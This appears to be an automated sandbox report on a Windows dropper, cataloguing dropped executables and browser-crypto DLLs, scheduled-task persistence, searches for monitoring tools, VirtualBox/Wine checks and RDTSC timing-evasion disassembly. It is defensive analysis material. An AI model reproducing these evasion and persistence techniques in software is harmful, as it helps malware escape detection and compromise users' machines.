Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Unpacked PE file: 7.2.eb98fe5174.exe.660000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Unpacked PE file: 8.2.53c7d901f1.exe.490000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8D3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 7_2_6C8D3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: 53c7d901f1.exe.6.dr Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1df7dc should be: 0x1dd49d
Source: eb98fe5174.exe.6.dr Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: file.exe Static PE information: real checksum: 0x1df7dc should be: 0x1dd49d
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: gmovqjaa
Source: file.exe Static PE information: section name: bqoswyio
Source: file.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: gmovqjaa
Source: explorti.exe.0.dr Static PE information: section name: bqoswyio
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: ylafldxq
Source: random[1].exe.6.dr Static PE information: section name: tgmwlthu
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: eb98fe5174.exe.6.dr Static PE information: section name:
Source: eb98fe5174.exe.6.dr Static PE information: section name: .rsrc
Source: eb98fe5174.exe.6.dr Static PE information: section name: .idata
Source: eb98fe5174.exe.6.dr Static PE information: section name:
Source: eb98fe5174.exe.6.dr Static PE information: section name: ylafldxq
Source: eb98fe5174.exe.6.dr Static PE information: section name: tgmwlthu
Source: eb98fe5174.exe.6.dr Static PE information: section name: .taggant
Source: 53c7d901f1.exe.6.dr Static PE information: section name:
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .rsrc
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .idata
Source: 53c7d901f1.exe.6.dr Static PE information: section name:
Source: 53c7d901f1.exe.6.dr Static PE information: section name: ylafldxq
Source: 53c7d901f1.exe.6.dr Static PE information: section name: tgmwlthu
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .taggant
Source: freebl3.dll.7.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.7.dr Static PE information: section name: .00cfg
Source: mozglue.dll.7.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.7.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.7.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.7.dr Static PE information: section name: .didat
Source: nss3.dll.7.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.7.dr Static PE information: section name: .00cfg
Source: softokn3.dll.7.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.7.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B0D84C push ecx; ret 6_2_00B0D85F
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C90B536 push ecx; ret 7_2_6C90B549
Source: file.exe Static PE information: section name: entropy: 7.97875321730639
Source: file.exe Static PE information: section name: gmovqjaa entropy: 7.954088444564839
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.97875321730639
Source: explorti.exe.0.dr Static PE information: section name: gmovqjaa entropy: 7.954088444564839
Source: random[1].exe.6.dr Static PE information: section name: ylafldxq entropy: 7.952660090693873
Source: eb98fe5174.exe.6.dr Static PE information: section name: ylafldxq entropy: 7.952660090693873
Source: 53c7d901f1.exe.6.dr Static PE information: section name: ylafldxq entropy: 7.952660090693873
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_5736606B9E4AF5D84DA5A728AAAD52EB
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_5736606B9E4AF5D84DA5A728AAAD52EB
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_5736606B9E4AF5D84DA5A728AAAD52EB
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_6C9355F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F05E second address: B5F064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5E8ED second address: B5E8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5E8F1 second address: B5E8F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5E8F5 second address: B5E900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDECEE second address: CDECF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDECF3 second address: CDECFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0BC8515D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDECFD second address: CDED07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9D6A second address: CC9D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9D7B second address: CC9D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9D85 second address: CC9D8F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD54 second address: CDDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF0BCB462B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD63 second address: CDDD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD7D second address: CDDD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD8A second address: CDDD8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD8E second address: CDDD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF0BCB462B6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD9E second address: CDDDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDDA4 second address: CDDDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE095 second address: CDE099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDFEF8 second address: CDFEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDFEFC second address: CDFF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0121 second address: CE016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 68DD7A9Bh 0x00000011 js 00007FF0BCB462B6h 0x00000017 lea ebx, dword ptr [ebp+12454E62h] 0x0000001d mov dword ptr [ebp+122D2B95h], eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF0BCB462C8h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE01D7 second address: CE0223 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BC8515DAh 0x00000012 add dword ptr [ebp+122D1C9Eh], esi 0x00000018 pop ecx 0x00000019 push 00000000h 0x0000001b jmp 00007FF0BC8515E9h 0x00000020 mov dx, 4091h 0x00000024 call 00007FF0BC8515D9h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0223 second address: CE022D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE022D second address: CE0232 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0232 second address: CE0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FF0BCB462BDh 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FF0BCB462C4h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FF0BCB462BBh 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jns 00007FF0BCB462B8h 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0286 second address: CE028C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE028C second address: CE0290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2C37 second address: CF2C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF8EA second address: CFF912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF0BCB462C3h 0x0000000f jmp 00007FF0BCB462BBh 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF912 second address: CFF925 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0BC8515DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFFA4D second address: CFFA72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BCB462C7h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFFBAD second address: CFFBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00162 second address: D0016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0016A second address: D001AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 jmp 00007FF0BC8515E7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0BC8515DFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D001AE second address: D001B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D009F4 second address: D00A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF0BC8515D6h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jl 00007FF0BC8515D8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
